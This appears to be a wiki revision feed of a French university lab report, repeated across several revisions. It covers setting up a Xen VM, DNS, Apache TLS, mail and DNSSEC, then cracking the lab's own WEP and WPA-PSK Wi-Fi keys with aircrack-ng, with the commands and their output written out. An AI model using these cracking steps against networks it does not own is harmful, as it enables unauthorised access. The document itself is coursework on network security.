Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
===Générer une demande de certificat en SHA 2===<br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
=== DNSSEC ===<br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signez les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre><br />
<br />
== Cassage clé ==<br />
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau<br />
=== Cassage de clé WEP ===<br />
Commençons par detecter notre interface wifi par le biais d'un<br />
<pre>ifconfig</pre><br />
ou<br />
<pre>iwconfig</pre><br />
<br />
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.<br />
<br />
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par <br />
<pre>airmon-ng start wlan2 </pre><br />
Cette commande permet de mettre en mode moniteur notre interface wifi<br />
Si tout se passe correctement, vous allez voir apparaitre<br />
<pre>creation du mon0<br />
<br />
Interface Chipset Driver<br />
<br />
mon0 Ralink RT2870/3070 rt2800usb - [phy1]<br />
wlan0 Broadcom wl - [phy0]<br />
wlan2 Ralink RT2870/3070 rt2800usb - [phy1]<br />
(monitor mode enabled on mon1)<br />
</pre><br />
Nous observons bien que le mode moniteur est activé pour notre wlan2.<br />
<br />
Nous pouvons observer tous les réseaux grâce à la commande <br />
<pre>airodump-ng wlan2</pre><br />
<br />
Une fois que nous avons repéré la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte<br />
<pre>airodump-ng wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack</pre><br />
<br />
-c permet de le selectrionner le channel de communication<br />
-w le nom du fichier dans lequel airodump va enregistrer les données<br />
--bssid permet d'indiquer l'adresse mac de la cible <br />
--essid permet d'indique le ssid de la cible (nom du réseau)<br />
<br />
<pre>CH 8 ][ Elapsed: 1 min ][ 2016-11-21 15:08 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:52 -41 45 799 53316 506 8 54e. WEP WEP cracotte03 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -28 54e-54e 222 60221</pre> <br />
<br />
On peut visualiser le nombre de paquets qui transit. <br />
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.<br />
<pre>root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2<br />
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)<br />
15:00:01 Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8<br />
<br />
15:00:01 Sending Authentication Request (Open System)<br />
<br />
15:00:03 Sending Authentication Request (Open System)<br />
<br />
15:00:05 Sending Authentication Request (Open System) [ACK]<br />
15:00:05 Authentication successful<br />
15:00:05 Sending Association Request [ACK]<br />
15:00:05 Association successful :-) (AID: 1) </pre><br />
<br />
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal<br />
<pre>root@Piranha:/home/pifou#aircrack-ng crack.cap <br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[00:00:39] Tested 257766 keys (got 32866 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) <br />
1 0/ 1 EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) <br />
2 0/ 1 EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) <br />
3 0/ 1 EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) <br />
4 0/ 1 EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) <br />
5 1/ 2 EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) <br />
6 0/ 1 EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) <br />
7 0/ 1 EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) <br />
8 0/ 1 EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) <br />
9 0/ 1 EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) <br />
10 3/ 1 62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) <br />
11 5/ 1 68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) <br />
12 0/ 2 79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) <br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] <br />
Decrypted correctly: 100%</pre><br />
<br />
=== Cassage de clé WPA-PSK ===<br />
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. <br />
Nous utilisons pour commencer<br />
<pre>airmon-ng start wlan2 </pre><br />
Puis<br />
<pre>airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F</pre><br />
--encrypt permet de sélectionner le type d'encryption souhaité.<br />
<pre> CH 6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
30:5A:3A:15:F6:3F -34 100 738 1323 26 6 54e WPA2 CCMP PSK Poneyus <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
30:5A:3A:15:F6:3F 74:29:AF:F3:FD:91 -16 1e- 1 75 265 <br />
30:5A:3A:15:F6:3F 04:DB:56:3D:FD:A2 -40 0e- 0e 4709 1367 </pre><br />
<br />
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option <i>handshake</i><br />
<br />
et nous pouvons utiliser la commande<br />
<pre> aircrack-ng Poney.cap dico.txt</pre><br />
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt <br />
Et au bout d'une heure nous parvenons à retrouver la clé WPA .<br />
<br />
<pre> Aircrack-ng 1.2 beta3<br />
<br />
<br />
[01:01:16] 2857196 keys tested (792.44 k/s)<br />
<br />
<br />
KEY FOUND! [ 02857193 ]<br />
<br />
<br />
Master Key : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 <br />
D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 <br />
<br />
Transient Key : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 <br />
C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 <br />
21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 <br />
22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 <br />
<br />
EAPOL HMAC : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 </pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35651TP sysres IMA2a5 2016/2017 G42016-12-06T10:23:22Z<p>Jturut : /* Cassage clé */</p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
=== Installation du serveur HTTP ===<br />
<pre> apt-get install apache2 </pre><br />
=== Installation du serveur DNS ===<br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
===Configuration de notre nom de domaine===<br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
===Installation boite mail===<br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
===Générer une demande de certificat en SHA 2===<br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
=== DNSSEC ===<br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signez les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre><br />
<br />
== Cassage clé ==<br />
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau<br />
=== Cassage de clé WEP ===<br />
Commençons par detecter notre interface wifi par le biais d'un<br />
<pre>ifconfig</pre><br />
ou<br />
<pre>iwconfig</pre><br />
<br />
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.<br />
<br />
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par <br />
<pre>airmon-ng start wlan2 </pre><br />
Cette commande permet de mettre en mode moniteur notre interface wifi<br />
Si tout se passe correctement, vous allez voir apparaitre<br />
<pre>creation du mon0<br />
<br />
Interface Chipset Driver<br />
<br />
mon0 Ralink RT2870/3070 rt2800usb - [phy1]<br />
wlan0 Broadcom wl - [phy0]<br />
wlan2 Ralink RT2870/3070 rt2800usb - [phy1]<br />
(monitor mode enabled on mon1)<br />
</pre><br />
Nous observons bien que le mode moniteur est activé pour notre wlan2.<br />
<br />
Nous pouvons observer tous les réseaux grâce à la commande <br />
<pre>airodump-ng wlan2</pre><br />
<br />
Une fois que nous avons repéré la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte<br />
<pre>airodump-ng wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack</pre><br />
<br />
-c permet de le selectrionner le channel de communication<br />
-w le nom du fichier dans lequel airodump va enregistrer les données<br />
--bssid permet d'indiquer l'adresse mac de la cible <br />
--essid permet d'indique le ssid de la cible (nom du réseau)<br />
<br />
<pre>CH 8 ][ Elapsed: 1 min ][ 2016-11-21 15:08 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:52 -41 45 799 53316 506 8 54e. WEP WEP cracotte03 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -28 54e-54e 222 60221</pre> <br />
<br />
On peut visualiser le nombre de paquets qui transit. <br />
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.<br />
<pre>root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2<br />
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)<br />
15:00:01 Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8<br />
<br />
15:00:01 Sending Authentication Request (Open System)<br />
<br />
15:00:03 Sending Authentication Request (Open System)<br />
<br />
15:00:05 Sending Authentication Request (Open System) [ACK]<br />
15:00:05 Authentication successful<br />
15:00:05 Sending Association Request [ACK]<br />
15:00:05 Association successful :-) (AID: 1) </pre><br />
<br />
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal<br />
<pre>root@Piranha:/home/pifou#aircrack-ng crack.cap <br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[00:00:39] Tested 257766 keys (got 32866 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) <br />
1 0/ 1 EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) <br />
2 0/ 1 EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) <br />
3 0/ 1 EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) <br />
4 0/ 1 EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) <br />
5 1/ 2 EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) <br />
6 0/ 1 EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) <br />
7 0/ 1 EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) <br />
8 0/ 1 EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) <br />
9 0/ 1 EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) <br />
10 3/ 1 62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) <br />
11 5/ 1 68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) <br />
12 0/ 2 79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) <br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] <br />
Decrypted correctly: 100%</pre><br />
<br />
=== Cassage de clé WPA-PSK ===<br />
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. <br />
Nous utilisons pour commencer<br />
<pre>airmon-ng start wlan2 </pre><br />
Puis<br />
<pre>airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F</pre><br />
--encrypt permet de sélectionner le type d'encryption souhaité.<br />
<pre> CH 6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
30:5A:3A:15:F6:3F -34 100 738 1323 26 6 54e WPA2 CCMP PSK Poneyus <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
30:5A:3A:15:F6:3F 74:29:AF:F3:FD:91 -16 1e- 1 75 265 <br />
30:5A:3A:15:F6:3F 04:DB:56:3D:FD:A2 -40 0e- 0e 4709 1367 </pre><br />
<br />
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option <i>handshake</i><br />
<br />
et nous pouvons utiliser la commande<br />
<pre> aircrack-ng Poney.cap dico.txt</pre><br />
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt <br />
Et au bout d'une heure nous parvenons à retrouver la clé WPA .<br />
<br />
<pre> Aircrack-ng 1.2 beta3<br />
<br />
<br />
[01:01:16] 2857196 keys tested (792.44 k/s)<br />
<br />
<br />
KEY FOUND! [ 02857193 ]<br />
<br />
<br />
Master Key : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 <br />
D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 <br />
<br />
Transient Key : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 <br />
C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 <br />
21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 <br />
22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 <br />
<br />
EAPOL HMAC : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 </pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35650TP sysres IMA2a5 2016/2017 G42016-12-06T10:14:41Z<p>Jturut : /* Cassage de clé WPA-PSK */</p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
